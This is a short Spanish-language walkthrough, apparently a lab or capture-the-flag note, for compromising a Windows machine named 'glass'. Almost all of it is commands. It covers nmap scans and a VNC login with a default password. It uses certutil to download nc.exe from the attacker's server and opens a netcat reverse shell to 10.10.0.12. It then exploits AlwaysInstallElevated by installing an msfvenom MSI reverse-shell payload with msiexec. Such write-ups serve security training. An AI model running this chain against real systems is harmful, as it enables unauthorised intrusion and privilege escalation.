nmap -A -p- -oA glass 172.31.1.25 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210711064219.png

nmap -sC -sV -O -p- -oA glass 172.31.1.25

nmap -sU -O -p- -oA glass-udp 172.31.1.25

vncviewer 172.31.1.25

Pasted image 20210711064358.png

Usamos la contrasena por defecto password

python3 -m http.server 8888

certutil -f -split -urlcache http://10.10.0.12:8888/nc.exe nc.exe

Pasted image 20210711064850.png

nc.exe -e cmd.exe 10.10.0.12 443

rlwrap nc -lvnp 443

Pasted image 20210711065157.png

python3 -m http.server 8888

certutil -f -split -urlcache http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

Pasted image 20210711065649.png

Pasted image 20210711070204.png

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Vemos que este usuario tiene (0x1)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=443 -f msi -o glass_shell.msi

python3 -m http.server 8888

certutil -f -split -urlcache http://10.10.0.12:8888/glass_shell.msi glass_shell.msi

msiexec /quiet /qn /i glass_shell.msi

Pasted image 20210711074610.png

boxes

copyright©2022 Cu3rv0x all rights reserved